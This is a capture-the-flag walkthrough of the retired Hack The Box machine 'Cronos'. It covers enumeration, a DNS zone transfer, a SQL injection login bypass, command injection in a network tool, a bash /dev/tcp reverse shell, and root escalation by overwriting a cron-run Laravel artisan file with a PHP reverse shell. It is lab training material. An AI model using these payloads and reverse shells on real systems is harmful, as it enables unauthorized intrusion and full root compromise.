HTB Walkthrough: Cronos w/o Metasploit (retired)
Cronos is a retired box on HTB and is part of TJ Null’s OCSP-like boxes.
Hostname: Cronos| Difficulty Level: Medium | Operating System: Linux
NMAP Scan
┌──(root💀kali)-[/home/kali/labs/HTB/Cronos]
└─# nmap -sC -sV -oA Cronos 10.10.10.13
Starting Nmap 7.91 ( https://nmap.org ) at 2021–06–03 18:49 EDT
Nmap scan report for 10.10.10.13
Host is up (0.021s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
| 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Enumeration
┌──(root💀kali)-[/home/kali/labs/HTB/Cronos]
└─# dig axfr @10.10.10.13 cronos.htb; <<>> DiG 9.16.13-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb. 604800 IN NS ns1.cronos.htb.
cronos.htb. 604800 IN A 10.10.10.13
admin.cronos.htb. 604800 IN A 10.10.10.13
ns1.cronos.htb. 604800 IN A 10.10.10.13
www.cronos.htb. 604800 IN A 10.10.10.13
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 20 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Sat Jun 05 10:25:58 EDT 2021
;; XFR size: 7 records (messages 1, bytes 203)
Adding the new found subdomains in /etc/hosts. Source code hints on usage of laravel framework.
You will find a login portal when you browse http://admin.cronos.htb
The parameter username is vulnerable to SQL injection. Refer ‘Bypassing Login Screens’ section from the link: https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
In exploiting, ‘admin’ #’ worked for username field. We will be routed to http://admin.cronos.htb/welcome.php which is using Net Tool v0.1
Exploitation
Portal is vulnerable to command injection.
Refer to ‘Chaining commands’ section from https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
To test for vulnerability, enter ‘8.8.8.8; ls -la’ and you will see contents of the webserver folder. Once confirmed, enter reverse below shell script and open a netcat session in kali.
bash -c ‘bash -i >& /dev/tcp/<Kali IP>/9876 0>&1’
And you will get reverse shell + user flag.
Privilege Escalation
Running enumeration script ‘linpeas.sh’
Interesting cronjob
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
There were two interesting ports. A simple google search will reveal that laravel uses port 3306.
tcp 0 0 127.0.0.1:3306
tcp 0 0 127.0.0.1:953
[+] Finding passwords inside key folders (limit 70) — no PHP files
/etc/acpi/powerbtn.sh: userhome=`getent passwd $user | cut -d: -f6`
/etc/apache2/sites-available/default-ssl.conf: # file needs this password: `xxj31ZMTZzkVA’.
www-data have privileges to run artisan cronjob. The cronjob runs with root privileges. Editing artisan file as below and opening another nc session in kali:
echo “<?php \$sock=fsockopen(\”<Kali IP>\”,9877);exec(\”/bin/bash -i <&3 >&3 2>&3\”); ?>” > /var/www/laravel/artisan
And you will get root shell + flag.
Note: The reverse shell script does not have to be strictly php script. You can use simple netcat. There were some rabit holes on this box.
